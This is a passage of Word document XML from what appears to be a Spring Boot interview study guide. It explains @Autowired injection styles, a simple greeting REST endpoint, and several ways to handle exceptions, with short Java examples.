          <v:rect id="_x0000_i2559" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB58C25" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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How it Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE5E34"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Spring looks for a matching bean in the container by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and injects it into the target field, constructor, or method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200C6E8" w14:textId="77777777" w:rsidR="009F6D6F"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4B786AD">
          <v:rect id="_x0000_i2560" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DBA035" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Usage Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DB046"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1. Field Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42804EEA"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F603D8D"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A261C32"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63147910"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    @Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23753EEB"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB8A9F"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4401DA04"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2. Constructor Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615A6A5"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6BD97"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C425CB" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EAB1B7"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final EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB09292" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF3C3C1"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A99F5A"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EmployeeService(EmployeeRepository employeeRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47530A2D"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this.employeeRepository = employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA28F4"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1BC1F2DB"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7A8E89B5"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3. Setter Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945CFE7"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645A12B"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0844B6B5" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F21E730"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AF076F" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FBD15D9"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FC0E95"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void setEmployeeRepository(EmployeeRepository repo) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C84192"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this.employeeRepository = repo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188856E8"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417AC617"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1E0E48F5" w14:textId="77777777" w:rsidR="009F6D6F"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FB66AA5">
          <v:rect id="_x0000_i2561" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2511A85C" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Optional Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A498"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Use with @Qualifier if multiple beans of the same type exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB2685"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an be used with required=false to make the dependency optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C61AB37" w14:textId="77777777" w:rsidR="009F6D6F"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42626F1">
          <v:rect id="_x0000_i2562" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F209DD"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Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">@Autowired tells Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resolve and inject a bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the marked class automatically, promoting loose coupling and better dependency management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC70770" w14:textId="7F46D0A7"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22ACEA8">
          <v:rect id="_x0000_i2563" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CDF06" w14:textId="20AF8FD9" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3542">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="596" w:name="_Toc196308076"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a REST API to accept user name as input, return the response with message as "Hello, user" and status as "success" and Endpoint - /api/message</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
    </w:p>
    <w:p w14:paraId="3817EF70" w14:textId="5C3B9D2C" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Here's a simple REST API using </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that accepts a username as input via a query parameter and returns a JSON response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09497455" w14:textId="77777777" w:rsidR="009F6D6F"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F538426">
          <v:rect id="_x0000_i2564" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62008FC8" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A98E09E"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GET /api/message?username=Siddhant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDFBFE" w14:textId="77777777" w:rsidR="009F6D6F"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018079">
          <v:rect id="_x0000_i2565" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E91D01" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Controller Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AB87C"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554301C"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C66B73"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MessageController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C150D58" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EADB877"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GetMapping("/message")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AA2B8"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ResponseEntity&lt;Map&lt;String, String&gt;&gt; getMessage(@RequestParam String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66913F7D"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D85A9"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sponse.put("message", "Hello, " + username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3D89C5"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sponse.put("status", "success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB41A1"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ResponseEntity.ok(response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69718917"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43A51BC2"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026CA9A" w14:textId="77777777" w:rsidR="009F6D6F"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EAA58A8">
          <v:rect id="_x0000_i2566" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3749B7" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sample Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313CE2A"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59D9158C"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message": "Hello, Siddhant",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C7219"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status": "success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76522BE7" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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54A13DA9" w14:textId="78D2D7B3"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BD08032">
          <v:rect id="_x0000_i2567" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E055F" w14:textId="0199F774" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="006075E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="597" w:name="_Toc196308077"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to handle Exceptions in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:p w14:paraId="1EA7A911" w14:textId="4312AB8B" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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n Spring Boot, exceptions can be handled in a structured and flexible way using the following approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210DBDFB" w14:textId="77777777" w:rsidR="004459F6"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D9D8101">
          <v:rect id="_x0000_i2568" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="273E00A1" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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1. Using @ControllerAdvice for Global Exception Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AAEE0B"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ntrollerAdvice is used to handle exceptions globally across all controllers in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ACF67" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7346C2"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ntrollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E5DFC"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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1880C3" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7310881C"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ExceptionHandler(ResourceNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42A11E"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ResponseEntity&lt;Object&gt; handleResourceNotFound(ResourceNotFoundException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BDAFD"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CBC47"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sponse.put("message", ex.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FDB9F"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sponse.put("status", "failure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9157E"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new ResponseEntity&lt;&gt;(response, HttpStatus.NOT_FOUND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAA3520"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4BC4F73B" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4D5FFC"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ExceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5968204F"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ResponseEntity&lt;Object&gt; handleGeneralException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAC67C5"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315A7B7"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sponse.put("message", "An unexpected error occurred");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CFE555"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sponse.put("status", "failure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DBD28"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new ResponseEntity&lt;&gt;(response, HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E61BF"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3DA8E1C3"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12E9CCAF" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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Custom Exception Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E1D0F"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ResourceNotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D86DD"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ResourceNotFoundException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7BB1E4"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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376436FE"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1A9E8CD6"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4F8DAA0F" w14:textId="77777777" w:rsidR="004459F6"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E6AC6CD">
          <v:rect id="_x0000_i2569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C1E3C2" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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2. Using @ResponseStatus Annotation for Specific Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114B48F2"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 @ResponseStatus annotation can be used to specify the HTTP status code when a particular exception is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A19A0" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5BAF6"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sponseStatus(HttpStatus.NOT_FOUND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31122CCF"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ResourceNotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214DD8F1"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ResourceNotFoundException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428863ED"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super(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E54CA"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74B78D1D"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40AD9988"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n this case, whenever a ResourceNotFoundException is thrown, the HTTP status will be 404 Not Found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7C3F5" w14:textId="77777777" w:rsidR="004459F6"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1596C3C">
          <v:rect id="_x0000_i2570" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5567C4" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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3. Using @ExceptionHandler in Controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737ABB44"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You can also handle exceptions specific to a controller using @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F23A7" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B79290"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lastRenderedPageBreak/>
        <w:t>@RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E7070"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC2F29"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A13C1" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF4C779"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GetMapping("/message")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C957089"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String getMessage(@RequestParam String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AE9C0"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if (username == null || username.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B62425"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throw new IllegalArgumentException("Username cannot be empty");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B957E87"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5123C7C6"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Hello, " + username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3E2C0"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640EC833" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26232E50"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ExceptionHandler(IllegalArgumentException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4681D"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ResponseEntity&lt;Object&gt; handleIllegalArgument(IllegalArgumentException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AEB16"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Map&lt;String, String&gt; response = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE9A0ED"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sponse.put("message", ex.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFA08D"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sponse.put("status", "failure");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684F362F"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new ResponseEntity&lt;&gt;(response, HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DE97BE"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137038BB"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533D1634"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n this case, if an IllegalArgumentException occurs, it will be caught and handled by the method with @ExceptionHandler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6989B28A" w14:textId="77777777" w:rsidR="004459F6"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99F164">
          <v:rect id="_x0000_i2571" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62933651" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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4. Using ResponseEntityExceptionHandler for Common Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4497A7A1"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sponseEntityExceptionHandler can be extended to provide global exception handling for common exceptions, such as MethodArgumentNotValidException (for validation errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09069C0A" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9CE939"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ntrollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC1562"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CustomExceptionHandler extends ResponseEntityExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD3D19" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DDC286"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C4B5F"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otected ResponseEntity&lt;Object&gt; handleMethodArgumentNotValid(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A645A4C"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MethodArgumentNotValidException ex, HttpHeaders headers, HttpStatus status, WebRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8E6D4" w14:textId="77777777" w:rsidR="004459F6" w:rsidRPr="00D774B4" w:rsidRDefault="004459F6" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
